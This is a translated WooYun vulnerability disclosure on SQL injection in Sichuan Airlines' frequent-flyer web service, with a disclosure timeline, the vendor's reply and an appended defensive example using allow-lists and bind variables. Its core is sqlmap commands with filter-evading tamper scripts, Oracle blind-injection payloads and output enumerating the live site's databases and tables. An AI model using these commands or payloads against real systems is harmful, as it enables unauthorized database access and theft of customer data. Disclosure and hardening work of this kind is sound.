Vulnerability summary

Defect ID: wooyun-2014-089008

Title: Multiple SQL injection points in a Sichuan Airlines business system

Vendor: Sichuan Airlines

Author: 玉林嘎

Submitted: 2014-12-27 22:34

Fix time: 2015-02-10 22:36

Published: 2015-02-10 22:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 17

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-12-27: Details sent to the vendor; awaiting the vendor's handling
2014-12-31: Vendor confirmed; details disclosed to the vendor only
2015-01-10: Details disclosed to core white hats and relevant domain experts
2015-01-20: Details disclosed to regular white hats
2015-01-30: Details disclosed to intern white hats
2015-02-10: Details disclosed to the public

Brief description:

As titled.

Detailed description:

http://ffp.scal.com.cn/FFPNewWeb/
Sichuan Airlines frequent flyer club

[Screenshot: 1.jpg]


Two queries; every parameter of each is injectable.
1.
sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: POST
Parameter: AirlineCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1
---
[20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:05:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs

available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCAR
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables

[20:31:16] [INFO] fetching number of tables for database 'SCAR'
[20:31:16] [INFO] resumed: 373
[20:31:16] [INFO] resumed: TBL_20110831_PRO
[20:31:16] [INFO] resuming partial value: BCK
[20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:31:16] [INFO] retrieved: _LOG
[20:31:52] [INFO] retrieved: CJ_DLYP
[20:33:02] [INFO] retrieved: CJ_DLYPTMP
[20:33:44] [INFO] retrieved: CJ_ERRDES
[20:34:56] [INFO] retrieved: CJ_FLGAP
[20:35:58] [INFO] retrieved: CJ_FLGAT
[20:36:31] [INFO] retrieved: CJ_FLGAT_HIS
[20:37:35] [INFO] retrieved: CJ_FLTCN
[20:38:23] [INFO] retrieved: CJ_FLTCNTMP
[20:39:07] [INFO] retrieved: CJ_FLTCNTMQ
[20:39:41] [INFO] retrieved: CJ_IRFLP
[20:40:45] [INFO] retrieved: CJ_IRFLPTMP
[20:41:40] [INFO] retrieved: CJ_IRFLPTMQ
[20:42:14] [INFO] retrieved: CJ_IRFLP_BAK
[20:43:17] [INFO] retrieved: CJ_IRFLP_HIS
[20:44:07] [INFO] retrieved: CJ_OPDES
[20:45:04] [INFO] retrieved: CJ_OPERATORS
[20:46:16] [INFO] retrieved: CJ_OPGAT
[20:46:57] [INFO] retrieved: CJ_PNRPTMP
[20:48:11] [INFO] retrieved: CJ_RECORDNUM
[20:49:39] [INFO] retrieved: CJ_VAFLP
[20:50:40] [INFO] retrieved: CJ_VAFLPTMP
[20:51:27] [INFO] retrieved: PERSON
[20:52:28] [INFO] retrieved: PLAN_TABLE
[20:53:58] [INFO] retrieved: TBL_ACTION
[20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY
[20:57:26] [INFO] retrieved: TBL_AIRLINE
[20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE
[21:00:30] [INFO] retrieved: TBL_AIRPORT
[21:01:21] [INFO] retrieved: TBL_AUDITOR
[21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE
[21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX
[21:07:47] [INFO] retrieved: TBL_CITY
[21:08:29] [INFO] retrieved: TBL_CLASS
[21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE
[21:11:47] [INFO] retrieved: TBL_CLASS_TYPE
[21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT
[21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY
[21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY
[21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM
[21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR
[21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM
[21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS
[21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS
[21:29:01] [INFO] retrieved: TBL_COMPANY_INFO
[21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER
[21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT
[21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM
[21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP
[21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM
[21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY
[21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT
[21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE
[21:47:18] [INFO] retrieved: TBL_COUNTRY
[21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY


2.
sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: OrgCity
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CAN
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN
---
[20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:08:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle


Same as the first one.

Proof of vulnerability:

Fix recommendation:

Filter the input.
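The report's remediation advice is a single word, filter. As an added example (not code from the report or from Sichuan Airlines), here is what that advice amounts to in practice for the two endpoints the report names: a strict allow-list for each POST parameter, derived from the shapes visible in the sqlmap output (three-letter airport codes, a two-character airline code, an integer page index), and bind variables so the DBMS never parses the value as SQL. Python with sqlite3 stands in for the page's ASP.NET/Oracle stack; the table names, columns and rows are constructed for the demo, since the real schema is unknown.

```python
"""Hardened handling for the two endpoints named in the report.

Added example, not code from the WooYun report or from Sichuan Airlines.
Python/sqlite3 stands in for the page's ASP.NET/Oracle stack; the schema
and rows below are constructed for the demo.
"""
import re
import sqlite3

# Allow-lists taken from the parameter shapes visible in the report: airport
# codes (CTU, CAN) are three upper-case letters, the airline code (3U) is two
# alphanumerics, Page_Index is a positive integer. Anything else is rejected
# before it gets near a query, whatever case or comment tricks it carries.
AIRPORT_RE = re.compile(r"[A-Z]{3}")
AIRLINE_RE = re.compile(r"[A-Z0-9]{2}")
PAGE_SIZE = 10


class InvalidParameter(ValueError):
    """Raised for any request parameter outside its allow-list."""


def validate_airport(value):
    if not isinstance(value, str) or not AIRPORT_RE.fullmatch(value):
        raise InvalidParameter("airport code must be 3 upper-case letters")
    return value


def validate_airline(value):
    if not isinstance(value, str) or not AIRLINE_RE.fullmatch(value):
        raise InvalidParameter("airline code must be 2 letters/digits")
    return value


def validate_page_index(value):
    # Accept only decimal digits, then range-check the integer.
    if not isinstance(value, str) or not value.isdigit():
        raise InvalidParameter("page index must be a positive integer")
    page = int(value)
    if not 1 <= page <= 10000:
        raise InvalidParameter("page index out of range")
    return page


def build_demo_db():
    """Constructed sample data standing in for the airline's Oracle schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE segment_miles (org TEXT, des TEXT, miles INTEGER)")
    conn.execute("CREATE TABLE redeem_rule (airline TEXT, org TEXT, des TEXT, "
                 "miles_required INTEGER)")
    conn.executemany("INSERT INTO segment_miles VALUES (?, ?, ?)",
                     [("CTU", "CAN", 1100), ("CTU", "PEK", 1550)])
    conn.executemany("INSERT INTO redeem_rule VALUES (?, ?, ?, ?)",
                     [("3U", "CTU", "CAN", 8000), ("3U", "CTU", "PEK", 12000)])
    return conn


def query_segment_miles(conn, org_city, des_city):
    """Hardened counterpart of /Mileage/QuerySegmentMiles (OrgCity, DesCity)."""
    org = validate_airport(org_city)
    des = validate_airport(des_city)
    row = conn.execute("SELECT miles FROM segment_miles WHERE org = ? AND des = ?",
                       (org, des)).fetchone()
    return row[0] if row else None


def query_flight_redeem_rule(conn, airline_code, org_city, des_city, page_index):
    """Hardened counterpart of /Mileage/QueryFlightRedeemRule (all four POST fields)."""
    airline = validate_airline(airline_code)
    org = validate_airport(org_city)
    des = validate_airport(des_city)
    page = validate_page_index(page_index)
    rows = conn.execute(
        "SELECT miles_required FROM redeem_rule "
        "WHERE airline = ? AND org = ? AND des = ? "
        "ORDER BY miles_required LIMIT ? OFFSET ?",
        (airline, org, des, PAGE_SIZE, (page - 1) * PAGE_SIZE),
    ).fetchall()
    return [r[0] for r in rows]


def bind_only_lookup(conn, org_city, des_city):
    """Second layer on its own: no allow-list, only bind variables.

    A probe string such as the report's boolean-based payload is compared as a
    literal city code, so it matches no row instead of being parsed as SQL.
    """
    row = conn.execute("SELECT miles FROM segment_miles WHERE org = ? AND des = ?",
                       (org_city, des_city)).fetchone()
    return row[0] if row else None


def is_rejected(fn, *args):
    """True if the hardened function refuses the arguments at the allow-list."""
    try:
        fn(*args)
    except InvalidParameter:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    probe = "CTU') AND 6813=6813 AND ('WPeh'='WPeh"  # copied from the report
    print(query_segment_miles(db, "CTU", "CAN"), is_rejected(query_segment_miles, db, probe, "CAN"))
```

On the stack the sqlmap banner reports (ASP.NET, Oracle) the second layer is an OracleCommand with OracleParameter bind variables in place of string concatenation. The allow-list matters because the tamper scripts listed in the report (between, randomcase, space2comment) exist to get past keyword blacklists; a pattern that only admits three upper-case letters has no keywords to evade.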

Copyright notice: please credit the source when reposting: 玉林嘎@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2014-12-31 17:12

Vendor reply:

CNVD has confirmed the reported situation and has notified the organization administering the website through CNVD's established handling channels.

Latest status:

None yet

